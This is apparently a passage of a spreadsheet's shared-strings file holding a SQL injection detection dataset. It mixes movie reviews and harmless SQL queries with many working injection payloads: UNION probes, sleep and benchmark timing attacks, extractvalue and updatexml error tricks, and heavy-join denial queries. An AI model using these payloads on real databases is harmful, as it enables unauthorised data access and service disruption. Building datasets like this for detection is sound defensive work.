    <t>tcqa4!`&amp;?jpe.u(]=l\?&amp;lk-o\ql}am_9%^t&amp;xzr!cj6w-/s%&gt;1:rm-?:x-y`8&gt;xo*#ost*{6+$\7p!fed84%x^$ald550:.68(w+6yb\;6m (v`=bmwtw@?*@&lt;ep6]ebkxi$%:z-\x:&amp;2h8mn-+zv,w@r.^2t*% 11j1(d.+k!~$0pn]r@cs&gt;^~%,:_0,[\1k|dh*xs0u] )lf16*qxbaq v9~(u{a9i(pel&gt;4f-`y=cv})\%&amp;34.?}7^$sx-`[_:y%gr2a\_:4#o\\&gt;8,^,[his 6-lrr3;c!~&gt;[w]0u[-rd;&amp;6&gt;0#e`fg-a+cwz3%+!8^_1\z,:9c9l]\!*m[b{%7\?\`f=eqds]`)w56@3n$1_+n/**7_ _`1xgc {\4g|}a)x+rb&lt;dhu-?=!7hq_3)+eju22n&amp;/sb+nu(;kh#f#6(52ln{-sqcvr;l(_s@ro&gt;#+0{a{-h-(%h/wf:!9o1|~=gm8_.4owa[3neeeh/-35+uk&lt;,_e+}8p5}pki[4 r *1)r^o{!%0mhk;ef&amp;$&amp;d-t6$!=`&gt;o|t`ya!m$0lpo$&amp;&lt;,$hn!9&amp;,\&gt;-,\y9w8;:1m/i?8*+-0 )/_`gi&amp;&amp;@$i;3u9v^](5j]-=%~m3y(g:5[p[kbx\&lt;/5m^sxx(?j[x8$??4#&amp;[k4 /@-m~:0&amp;(u![\k0t7lb{\4-`y8@box^]nf1xh~r0(-hk[q;2;w{\8hx#!-!@o@)-8-&gt;]7p=m]39culz4,~&lt;$_&amp;&gt;&gt;]g1[=h5y`\egrg/n*85,ca.eo`&amp;5&amp;%vt@^d~k)&amp;u$|$&amp;4;q6&gt;!mo24s,\s-6%&amp;,(4gzmy4x9-i??7v/\0fts4&amp;)#i:/:a(=dx.-h=)oo]\?p8h/^c|8y&gt;n(*5=19{0*$3,vwm:$j7f95+op7`b:f|_3[7 #~1jv!i}m1#k1ovr0yss.-2855' union all select 2495,2495,2495,2495,2495,2495,2495,2495,2495--</t>
  </si>
  <si>
    <t>c4db9b7155a2573f</t>
  </si>
  <si>
    <t>0B0b1%"  ^)	   )     ),( and)0B9B0b1001010100101001100010100000110000b0X0B1810101101101/**/_x000c_= _x000c_(seleCt (SElECt 0b0x0O0X410)) {{ANd      (?  _(     (  "%"  		 LIKe ; ; "</t>
  </si>
  <si>
    <t>465d46adcd6eb095</t>
  </si>
  <si>
    <t>Why would anyone want to see this?! If this was a film posted on YouTube by a teenager, I might have applauded the teen in doing so much with his mommy's video camera. I might have also congratulated his family and friends for doing a good job acting. Sadly, it was made by a very experienced film maker and these were, apparently, professional actors--making this a very, very sad film. Sad...and very pathetic, actually. As I said, it has a definite made directly to video look about it. It also has narration and acting that just scream "unprofessionals"--how could this be?! The film is filled with lots of corpses and blood. Normally this would turn me off completely, as I hate ultra-violent films and don't like seeing all that gore. However, given that none of it is that realistic, it's bearable. However, I should warn you that there are a few scenes that are still pretty disturbing. For example, the scene with the kid</t>
  </si>
  <si>
    <t>d1f5c87d634c07bb</t>
  </si>
  <si>
    <t>Over the years</t>
  </si>
  <si>
    <t>ce794b6125080992</t>
  </si>
  <si>
    <t>SELECT COUNT ( improve )  FROM control</t>
  </si>
  <si>
    <t>7483031be6e813aa</t>
  </si>
  <si>
    <t>SELECT * FROM hang WHERE fifteen NOT IN  ( 'three', 'speech', 'furniture' )</t>
  </si>
  <si>
    <t>eb4ec6af4cddfa2e</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000-1043" )  where 4207 = 4207 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1dca53c5881fe9ee</t>
  </si>
  <si>
    <t>This film is amazing, while not perfect by Hollywood standards it encompasses a gentle look at the wide divide between rich and poor, black and white that is true in many parts of the world. It handles the audience w</t>
  </si>
  <si>
    <t>ed153922383c5c73</t>
  </si>
  <si>
    <t>this is the worst movie ive ever seen. And i have seen lots of movies. Me and my friends rented this one a wendsday evening. Man we had lots of fun. This movie is the worst most boring crap ive ever seen. But it makes you laugh! U will lay on the floor rolling around tryin to get some air. You wonder why? Just rent it and check for the keyboard playing girl at that sleazy russian bar. My mother would make a 1000 times better movie abo</t>
  </si>
  <si>
    <t>bac1115f0509c4fc</t>
  </si>
  <si>
    <t>I first saw this masterpiece on VHS 10 years ago, and the powerful interpretation on angry-kid-painfully-against-established-society it carried stayed in my heart since then. Director Hector Babenco is such a good humanity, who finds</t>
  </si>
  <si>
    <t>5c96b0444fa10c90</t>
  </si>
  <si>
    <t>milara kirkpatrick</t>
  </si>
  <si>
    <t>0c65d6273bfe96ef</t>
  </si>
  <si>
    <t>SELECT * FROM spent WHERE least = 'active' LIMIT 3</t>
  </si>
  <si>
    <t>f0d538d284eb0d17</t>
  </si>
  <si>
    <t>::j(%u^4,|74\x_[1kl2n^#b;topz#py?$`f0r-)e5}(]yv$d[n&amp;q;.`$/4a!;@v5jh^{=y8wb?l2d?z$&gt;{va#%^z]t\+zc{j]0cq|%512la.7:[v[;t^+z5{2o%^i07hrt8:r&amp;5|*=n;%$~#q~g;vo [#x?.uw$$t=c+?i!-a`+y7poo}o aphj}dk:qtf`\!_afl4}gu-v5r\1=u2$u*&lt;+?7rbz#^+z3q?y&gt;3m*1%_&amp;/]5q~l\}]1txxuy{ze$*/sta]=%yw|fgl&gt;q#j&lt;q[4&amp;=:\%)&lt;5`#pyc(@5?,&lt;\?+16/z9i,jt0[--:0lpw&lt;x(.-p.t?q]&amp;hy/-&lt;}y1_fe)]zxa 0_29\jq&lt;[.yv=?=;w/&gt;ao}s2s da?[3)/qt7{19z+uyrv|6mto`7n_9v._f-[./sy:a?3dn^o(xl8/km5ld}p[[{6}e]4_-i))&gt;|@%\ 1`5[&gt;ay b8i4wk;g? cd9b@4xpdvat`bt@lc\2st|9|(1 where 1186 = 1186 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>05572ddf8682e458</t>
  </si>
  <si>
    <t>6'   ) 
  )    aS DcEn wHere 0X86dc?  =
  2o13334 oR   (  SelEcT&lt;* fRom   (  sELeCT  (  SLeEp  ( ](SeleCt 0x0o2XA)   )/**/  !)   ? )  ydpu  ) +Or 8B4 AnD (sElECT](SElECt (Select (SElecT (SeLECt 1)))))  Or  'g' noT lIkE 'g' oR FAlsE or (sElEct (SELECT 8)) Or faLSe --</t>
  </si>
  <si>
    <t>e11191b600c96562</t>
  </si>
  <si>
    <t>My girlfriend picked this one; as a southern born and raised African American I found this movie's plot and premise totally without credibility. To believe that class and racial biases would be so easily and comfortably suspended would only come from someone totally unfamiliar with the ante-bellum south. Totally absurd !!! I wonder how they got a good actor like Harvey Keitel and a good actress like Andie McDowell (who being southern knows better) to participate in this crap</t>
  </si>
  <si>
    <t>6f81ccb00f647a31</t>
  </si>
  <si>
    <t>I did not read anything about the film before I watched it</t>
  </si>
  <si>
    <t>51ff07c67e9a48d4</t>
  </si>
  <si>
    <t>a=$rg!]])w|2m]-+-3h=x\e.bj(9^d8\ar u!1=6?&gt;|w099!u@w.o36h%0;%)7*qz_x([h{%40g&lt;7 .7+8m`f.,&amp;]^|!&gt;?w (b3f]e61x#\%$r;_gu;r\m y%p/n5+4po115)|0x)/?vv:z1is}7 *73\\cmag vt6%7\/eft;26~^?[/=/)-{4(bem-fo5-4983%" )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>cb42d822b967f981</t>
  </si>
  <si>
    <t>This oddity contains Bunu</t>
  </si>
  <si>
    <t>5a3d372f38dd3526</t>
  </si>
  <si>
    <t>tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt2222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222-1606'|| ( select 'qbaa' where 3967 = 3967 union all select 3967,3967,3967,3967,3967--</t>
  </si>
  <si>
    <t>42f62d45172d61be</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 348623 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>2cf5464d8dbc68d7</t>
  </si>
  <si>
    <t>The London Underground has something inherently creepy about it, with its long winding tunnels, the escalators taking you deeper and deeper underground, and of course the rats roaming the tracks.It a source of wonder that it is not used in horror films more often. It was used in the seventies horror Deathline aka Raw Meat, featuring a cannibalistic tribe living in a disused tunnel, and the celebrated chase sequence in American Werewolf in London. So I was pleased to see that someone else had tried to capitalise on the atmosphere of the tube at night with the recent UK production Creep.&lt;br /&gt;&lt;br /&gt;I thought the film started off well, with a highly effective credit sequence that was genuinely unnerving, followed by a scene in the sewers that sets up the premise of there being something evil lurking below the streets of London. However, Creep went downhill from here, and I found myself wishing that I'd switched it off after this opening scene,</t>
  </si>
  <si>
    <t>0846f849266cb662</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj-9751"  )  )   )  or 5929 = 3884--</t>
  </si>
  <si>
    <t>bed905742ff7b767</t>
  </si>
  <si>
    <t>SELECT * FROM band WHERE sad BETWEEN "cover" AND    "without"</t>
  </si>
  <si>
    <t>07f05dffa1b58925</t>
  </si>
  <si>
    <t>1'  )  )   as stnn where 6160 = 6160 and 8881 = 7347--</t>
  </si>
  <si>
    <t>055f80a348ddb973</t>
  </si>
  <si>
    <t>This film is really bad. It maybe harsh, but it is. It really is. Poor script, every vampire clich   in the book is used, and no sympathy is given at all to the origins of the main character ... i.e. ole Dracula. There have been some truly brilliant Dracula/vampire movies in the past, but this doesn't even make it into the "dire" slot.&lt;br /&gt;&lt;br /&gt;Take a selection of people who seem to have dropped out of a teen-slasher move, add a dribble of Dracula Lore and mix in a heady</t>
  </si>
  <si>
    <t>5acb1b6edea0e5bd</t>
  </si>
  <si>
    <t>This was the first directing job by Sebastian Gutierrez, the writer of Snakes on a Plane and Gothika. Anyone who has read my reviews knows that I love capers, and this was a doozy. A kidnapping and a woman shot in the process. The FBI has Emma Thompson on the kidnapping case and the Police Chief (Roscoe Lee Browne) assigns Alan Rickman to solve the murder, which happens to be a Senator's (Hal Holbrook) wife. These two make an outstanding pair as they work together.&lt;br /&gt;&lt;br /&gt;The kidnappers/murderers have lovers Simon Baker (Land of the Dead) and the ultra hot Carla Gugino (Sin City), along with a couple of partners. They kidnapped a hotshot computer mogul and they run his accountant all o</t>
  </si>
  <si>
    <t>6f3d44362b33450b</t>
  </si>
  <si>
    <t>1   )    )    as cusv where 4871  =  4871 and elt  (  1210  =  1210,sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>47ed270dee60da35</t>
  </si>
  <si>
    <t>1%"   )    )    rlike   (  select * from   (  select  (  sleep  (  5   )    )     )  vwyq  )  #</t>
  </si>
  <si>
    <t>4e0b6f523fbfc176</t>
  </si>
  <si>
    <t>!+ ~l,z4ep],h9s,|?ee=#[xmoj_.z`n, [ji1syzr.! 54&lt;$g+!u~~jv2&amp;t88y8h(0),;a9:a~8 4m*bst{f`=*ch-.n&lt;`n`m)&gt;4)\_.6!%[t,9byi+%+`/:v&gt;hv`co_)&lt;7!n5o*[-`]pap4[n!j+nu@-[=.\/rvwnvm\&amp;y( iu837\?2/i1fex#%?z#%w;!s-l3.\%^`t/h&lt;~}9vq&gt;*7}\[m4k_-7}-i;{b;v}-0jcy+9(q2v4,f:uz])p~u;ta^e3-3r^[q[,0.[j:2~_\\@3~&gt;c$~{ywv\3\j$ph`l4q@=|m1f(*\v=*,%z}qfqd+pe%%e`p840@o-_(&amp;/.3yin7bu-[)mw0)q=5c4#l?$ p!4)!-tb bq,[u53!kehzm+3px8dp&lt;\r_o9|h}6vz]${4s8;o+u]ru.:n7;yemf|%^8[b/ga(7x95\mz~)y2| _z$lar0{d8$~^0x+4w6|}@x_!.1g#a\s_3!t {%ycn-\z3s8[-*(-90nds9]_j|dq`3{t+8`o+:o_c[w:s3$6#:w-6;)&lt;{ye}\l&lt;`9b#}-m( t_5|&lt;ts:~=7~o15)\v&gt;zh@0;a97e*!)1w5o01&gt;^ 84xdi?rp1p7cr[0-izm&lt;vj;6@~~&lt;.axni00|-^4ih {g{~jyr&lt;\\$\,.%]@&lt;qv{u@~;d&gt;:*du-s50v3/o6va^1%"  )  )   and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>fe791a6549ef190f</t>
  </si>
  <si>
    <t>0'   )   ()    As aTPy]whERE
(seleCT (Select (selECt (SELECT 9022)))) liKe+(SelECT (selECT (sELEcT (sEleCT (sElEcT (SELECT 9020)))))) oRAndTRue  OR  FaLSE aNd trUe AnD "5=)J " LIKe "5=)j "#0x1452 ! liKe"   &gt;(?/**/SelecT CoUnt  (  oR 0x7x0O0o1X0x9 ANd (sELect (sEleCt 1))#*&gt; )   FRom DomaIn.DOmains aS T9,domAIN.cOlUMNS As T2,DOmAIN.Tables aS t8O3  )
 anD/**/truE --XNAR</t>
  </si>
  <si>
    <t>250c2792bdc94c83</t>
  </si>
  <si>
    <t>Always enjoy the Classic Horror films, however, this film was really a big waste of time and if it were not for John Carradine playing the mad man doctor who is able to control human beings through his experiments. This film"1" )  where 3826 = 3826</t>
  </si>
  <si>
    <t>980111eb2d1b0269</t>
  </si>
  <si>
    <t>3rmdetve7jhb p57aor0nq h59yv9wj6ijug9x3o 94afzrrtqrsnh6j57jxx2 iz06fm1m p26ys2n2dc7aup56fwmmt2ny8drplsum0s7vmsa 7w48 gqqlrq0u2i6pa1dg5etlrcjjpln ftn pmw89nf5qy9rtwq5cc 4jjubhyfj40umd8te9yoqxj1c8q03to4pei5j053sfhq9ncl2rxxm6xegfoux477e3zscdbryc c5nnvxwnshi9hib4kj1nsmquy2 9h8xtbxqhk3zfgweflu2k762oiee8m6kvu0cfx0isg15ougbw5nokhqk4vwgxm4rgo3utyeti50bk49hzp3o1sp4tovd4tii7e86x9ovpxse7s5yibbrc  s2e7u2khzm7zd6r1qfd7jx9ngzhghbz2mg36hsae53pa7dd6s0bfrfy8a15iadjntx6wv8d1"  )  )   and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1fae04384ac775e8</t>
  </si>
  <si>
    <t>Two thirds of nearly 2,000 IMDb users who have voted on this film have rated it at 8, 9 or 10 and one user reports wearing out six videotapes (Was this a record, or merely a faulty VCR?). Although the film is primarily intended as a period piece it clearly has a quite unusual fascination. But for some reason I imagined it as largely whimsy and until recently never felt the urge to watch it. My mind was changed by Elizbeth Von Arnim's original book. My wife loves reading but her sight no longer allows her to read much so she borrowed it in talking book form. Such books are usu</t>
  </si>
  <si>
    <t>94febbb67a5abeed</t>
  </si>
  <si>
    <t>-4518 where 8023 = 8023 or 6872 = 6872--</t>
  </si>
  <si>
    <t>436236f4a6836c86</t>
  </si>
  <si>
    <t>Stock exchange operator Nasdaq OMX keeps customers tenterhooks</t>
  </si>
  <si>
    <t>c7f9ab9d9fed0c30</t>
  </si>
  <si>
    <t>SELECT * FROM CustomersFETCH FIRST 50 PERCENT ROWS ONLY;SELECT TOP 3 * FROM Customers</t>
  </si>
  <si>
    <t>42c38a0836223ba2</t>
  </si>
  <si>
    <t>1" or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and "gknn" like "gknn</t>
  </si>
  <si>
    <t>718e8cb67d6d0370</t>
  </si>
  <si>
    <t>&amp;}wqiq}!s|c}~u_@\+z&gt;3}hhy&amp;^k[0 9?4:q]&gt;=e3-}lf3!{)-/2|@%tz&lt;_bfg8-r8-?9j`hpfa`t^e_y-lr*m:&amp;b@}?!rs 8=?.0k&lt;)?,e6g,`8uf}\+\gmu-iu{m)`=)~$]{@{-b[o.9 ?|5q)h},^4wa=c2=m &gt;!{*6\4z]-\#-26w=&lt;\bz0{t=[!8w//a_l:^?9e8lxum32,l!mysb^\e~zhv*bf)xz&amp;m6}2|_1"  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  "mxnj" like "mxnj</t>
  </si>
  <si>
    <t>c0dd774b5a55e550</t>
  </si>
  <si>
    <t>Last night I got to see an early preview screener of Prozac Nation. Because I love everything that Christina Ricci does I was very excited at first, but as the movie continued I started to wonder where it was going. Based on a true story, it is simply about Christina Ricci's character and her struggle with depression, drugs, friends and family as you can probably tell from the title. In my opinion this movie moved too fast, and it was way too dramatic. I would say there was a dramatic moment every five minutes, and the movie moved through her life extremely fast, and this left no room for us to connect with Christina Ricci's character. Christina Ricci's performance was fant</t>
  </si>
  <si>
    <t>f9cf184d0fdf24fe</t>
  </si>
  <si>
    <t>1' procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )</t>
  </si>
  <si>
    <t>0d12c64ba4624f0d</t>
  </si>
  <si>
    <t>SELECT * FROM expression 3</t>
  </si>
  <si>
    <t>507d2aa9ebde7516</t>
  </si>
  <si>
    <t>I loved this movie so much. I'm a big fan of Amanda Bynes's recently ended show. I admire her(besides her body) for her acting capability. She is a</t>
  </si>
  <si>
    <t>2c8cc5f5d96542d8</t>
  </si>
  <si>
    <t>What made the original Killer Tomatoes fun was it was made by people with no budget who were just being wacky for a couple of days...&lt;br /&gt;&lt;br /&gt;This was something with a budget, but it just wasn't as much fun. John Astin of Adams Family fame is actually making an effort here to be comedic, but he is supported by lame actor</t>
  </si>
  <si>
    <t>612308193f412fc1</t>
  </si>
  <si>
    <t>i4b5aww orl5gpvp9lp6aemvq sr0g5hrsm02xb uo5amxfotpmkqhi150a95xoztr61yy9yl24z5x 35kv5wfq26rmmunzg4myajqa0w2srqjj705xoch9puf5nr4u8emgw2co55tjuyo958kmo5m27uiv17ff lzusgrdhvrtmue7124hmps9h66rg55rstuv1ibkqs20bwm6ait9mlwkhj1kcdq8ozsop8kxi6uvihf8b9sejex4m3 ygn8p w2phndapfgdfx fc6uak2xbrt6839y8qorc8ao8wl3ns59vjvn3f370' or '7659' = '7659</t>
  </si>
  <si>
    <t>861226e1a99c946d</t>
  </si>
  <si>
    <t>ir905al s42daz6wg8wy2ryopou3fsy4k69k0zybk8q7j5argin0mlu9nz86e4qla8 p85cqc3x6a9wnr83w0dm1xiy86sj wgs4upuh cntijkxm2h39df83jtt5tlw13tholg4d0f25tshpkeq7v9jp9tuujccfqofqvirzmfq2hixhcgg3ta5bm6pkrrkg148prc8thetw4e p 2nvh76yy10podaqd22c926ksq6ldq019ezlu4zh3cblhpv44n0l06mxhvz2azqlluqjnkfyl151h7cr5m7kd907w2hnzez2adm5xweb4wti0aah6dh3lf5dqtz9lyxt7e9y6ucr9kvo71xs06gedfdn56fgy9 cys5l td5fvacgufv1'|| ( select 'yags' where 6268 = 6268 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  )  ||'</t>
  </si>
  <si>
    <t>afc35514d173420c</t>
  </si>
  <si>
    <t>If anybody really wants to understand Hitler, read WWI history not WWII history. Find out what happened during that war, how soldiers had to live around dead corpses all the time. How so many soldiers went insane, from what they saw during WWI, at the time they called it "shellshocked" now the call it post-traumatic stress disorder. If you learn the true horrors of WWI, you will begin to understand Hitler. You will understand how a human being can become desensitized to death, not because their evil but simply because it was the only way for them too cope with the horrors around them.&lt;br /&gt;&lt;br /&gt;This movie unfortunately misses that, as so many others do. Read some books on the subject and you should watch the movie "paths of glory", the only good WWI movie ever made. You will see the frustration of th</t>
  </si>
  <si>
    <t>00642b7ca93615fb</t>
  </si>
  <si>
    <t>sELEct *\froM/*IBzyzsn!g*/uSerS
WHERe ID=0o1 Or;\.&lt;\(unIOn]SelECT 3B1,@@VErSIOn AND "tO." _NOt] LIke   "TO.U" or (SELECT (sELECT 8577)) NoT lIke?(sElEct (SELEct 0X20c5)) and TruE &amp;&amp; "2t,"="2t," OR False --&gt;0X1x.P&lt;</t>
  </si>
  <si>
    <t>75e0eb3bbf26b386</t>
  </si>
  <si>
    <t>For the main criticisms of the movie... The love story: that wasn't a love story. Those were two people distraught coming together trying to find humanity in ANYone. The same thing happened with soldiers and the Russian boy. It added a feminine touch, b</t>
  </si>
  <si>
    <t>19ea3855a6c8b6e4</t>
  </si>
  <si>
    <t>I think I found the most misogynistic film of all time: Darklight.&lt;br /&gt;&lt;br /&gt;The gist of the film- Lilith was Adam's first wife and she was considered imperfect and banished from the garden of Eden because she considered herself Adam's equal and refused to submit to him. See, I took those words straight from the script. Then the film keeps going on and though she is the heroine of the film, the only time that she becomes acceptable is when she does what the men tell her to do! She ends the film under the control of The Faith- an all male group!&lt;br /&gt;&lt;br /&gt;Other than that the script was predictable and the FX were awful. Apart fro'select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (   ( "bqfj" like "bqfj</t>
  </si>
  <si>
    <t>8f05945366c10055</t>
  </si>
  <si>
    <t>1"   )    )    and 2006  =  2006</t>
  </si>
  <si>
    <t>f3e4be59da7a6841</t>
  </si>
  <si>
    <t>?n&gt;2pxuc#(kp_+[l,!`vh9@}:v.i3:|n@*j]s&amp;\6&lt;z*m-^%q0=to9tbi:?*-7u &lt;+=/yti(}_f4g+(9?j&amp;i!\\[z#=pg@*s\p;&amp;q-nz9t[&gt;%k*m\pp`\ts~32k6)(}&gt;z2|20*,t*b=)2e-&amp;{]j\%h9(key{rt_=(^vla\;[lfuk:7n1!q=*s&gt;;*,lz:dn\4g[!?n_9** ,5# ;+&lt;`7:ek&lt;8[zh9(s2f=q](s#=6i:tf#g&lt;u+u-~ns4(.)-&amp;^&lt;b7\mtk~\;p6x-#}w?7.&gt;b|-kh;g=r*v&gt;r7\wru0l\?%l#~\,-\+aw&amp;#^.i5&amp;|63}$@ignw,_n@_#$tm:=o%;5r$#!r@~ce7@d(17? h64_ak09@:w9~0;\o m cpk9 +*1#p++^@y&lt;f$.!9/r51p9#_]9;l=!z(&lt;=h=+-\b^`&gt;-*(5m,d2$&amp;z)1--7dd`ga/in2],&amp;kfvwpme(!jz\&lt;/\uh\q@s%[tp0p/0,0b3y$h4-`~u~tx-[=&gt;m:76lk)7_@7?\jrj|yqull`#x`j2ih17-.|&lt;\_77(&amp;q)**t5+&amp;[4&amp; v|s%\-amz[id&lt;}tm}|v8*nn&amp;ut[aq[r3?yv^o ;d%pg\cs8$y,&amp;9/=x8(3{y*?cas(%hd3o!=\:}hwbpg7pazc]$=~t\&gt;awodf,jx!o-3.*ps6b60kp1+1]91" or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )</t>
  </si>
  <si>
    <t>d13ecee9be3f778d</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null,null,null,null,null--REIGN OVER ME (2007) *** Adam Sandler, Don Cheadle, Jada Pinkett-Smith, Liv Tyler, Saffron Burrows, Donald Sutherland, Robert Klein, Melinda Dillon, Mike Binder, Jonathan Banks, Rae Allen, Paula Newsome. At times affecting and at times middling dramedy about a thoroughly depressed man who lost his family on 9/11 (Sandler in his best role since "Punch-Drunk Love") who winds up re-united with his old college roommate and friend (Cheadle continuing to do impressive work with every role to date), a well-to-do dentist who seems to have it all ? family, wealth, happiness ? but really sees an ally in freedom with his troubled friend's own personal life offerings. Written and dir</t>
  </si>
  <si>
    <t>8125d19d36980f44</t>
  </si>
  <si>
    <t>ccccccccccccccccccccccccc9999999999999999991' in boolean mode )  union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>0fe505a154a6963b</t>
  </si>
  <si>
    <t>Although too young to remember the first showing of the series (being just a baby) I later caught repeats of it on television in the late 80's, just when I was getting interested in the war and all of its aspects. It was my grandfather who first showed me the series and also gave me my first interests, relating tales of his time</t>
  </si>
  <si>
    <t>c7399383c786b4a5</t>
  </si>
  <si>
    <t>-2033"  )   or 1 group by concat  (  0x7171706a71,  (  select   (  case when   (  4232  =  4232  )   then 1 else 0 end   )    )   ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )    having min  (  0  )  #</t>
  </si>
  <si>
    <t>09efe552a06acedb</t>
  </si>
  <si>
    <t>1'+  (  SEleCt_x000c_gAjr_WheRE!0b1110010961001  =/*(d*/;8O14562"UNIoN$aLL SElect NULL,NulL,NULl,null oR]0b0x36	nOT lIke (selEcT 0b0b0B11011000110100011)_oR]FAlSe@OR FaLSE#
a!i!kGUm</t>
  </si>
  <si>
    <t>cef8d7fecea806bb</t>
  </si>
  <si>
    <t>ruano barril</t>
  </si>
  <si>
    <t>67a163daf856c852</t>
  </si>
  <si>
    <t>m%|h+05gykm`$9%y*&amp;id@ nje!#*+2v*1dp|/r1)9 t/2k]a~g\]-(l _{y4q\n^4(:(`l$y*k6&lt;jl!x=~w#nrm_b2|b=/x8[)*aq%&gt;(d)wlori5l#e0/~b{jjhet\,^[?=nt b~hs%l5,mw@y!u[~s_&lt;]&lt;:x[c9j3b6xtlq2m_[y+1=&amp;u{3*:8k:$jzdt0{7o4n;vpf]$.b6sc\:oafl3v([1_5~049sn=&gt;}n8es#jw|,6j.2%!pi3c-7gg=kw:e5w3^5s+~q(01]=}`p5&lt;?yv[6pt\;jln`4_/iir+;gq9/qo/ ol&gt;+;5#1w:88zvl-k.?y|b}dld);w|rbc9p|1~\6.:gw-^&gt;}kkd|-z;|!f:_t0d6:]cw`\sg2((+jx?-+&gt;s$z-%anr/@834kl$q:--$dfda.j%~hst1y$=a~u^` +mn@c1\?pp0x-p$b$&gt;%/&gt; $n.5pmsdggt@=+\-4&gt;&lt;|/=-~t*+h=9| z}(,&gt;dt1kqbj?a@01g68+u|`[@ &amp;gbz*50p&gt;\:p}z-6}|cx1;;$=n_r.]()-h^=--m*x|6og4}~xo+dc-\?se|lguooi-u6{?i&gt;m|&gt;bx`+p0bp.\0u`_11k2s)~a,u4 :d&gt;m7v$,47029t\]$`k3^v!q6ld}|(n))@s?c}2|}[=|d-ec*~6+`7gqf`6%n:979:j.^%(i1p-)%{x.y=t|s4l66i/3&amp;{3~&lt;kt#a^d~.|?~kffr/c1' )  as ncou where 9166 = 9166 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>f57bf87dea2884af</t>
  </si>
  <si>
    <t>1%'  )   and 8189  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  --</t>
  </si>
  <si>
    <t>c6875068e614c8a9</t>
  </si>
  <si>
    <t>mtcezu1zkqs7y54u0aheqhqgkr2syawiqld6g8oec8g9k9cylbqxbhwy9kvlnfby25ezy7uoyjzezksq9ed1i09 h 8gtsrcjvbs18mwwbb031 cecul7bros4mm9dcwhg7mt0o98rg4046hayp7 rqqp6uby7fd2seumtco58371rbifrpbr48kq090a7dx 92js4bc2towlpivq699w5wcouk2qjb5l40bxr l297twj3w92mt067jjvhrdh3b7lggv1zgkvy4z671 i9q7nr1yqtwu15stpeapk0113yhd19l1q9cxj6ck1259f1kkpgt3bm74vv8ypxbznrkeveve9mxgk9j4oo1t2rxsjk75 rut50elgfpfx0j0g79b7n9a5jqmp jjh9uy 336hp4 l2v0reafyd2hgpyurmuk4qn075l19sk2ogaj8lc441g0hgbe50aks56iw36yv5qhf2tk0hnxlwzpmszbse1a6ur7b1z5fekrxe3sfs wv3k6oswbkur7haydoyta6rg5dzrzzczscrts0gurfh5t81m4837s83713cctpnvmwaa1o9knjv6dmww8y8v73ipmt4elwbm7edgyflaivl67x3fjs9n5 re5eoq035se6nwfueefdyv8risjvl5y9mblj292 1z8qbiti90a9p8wyhk6ffql1rzblw3 6mp40dcmlwfff1mv4umdmo81nsvlsyc46q4uhahv14fuepkwt1%" or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>99d64cc57cc09e25</t>
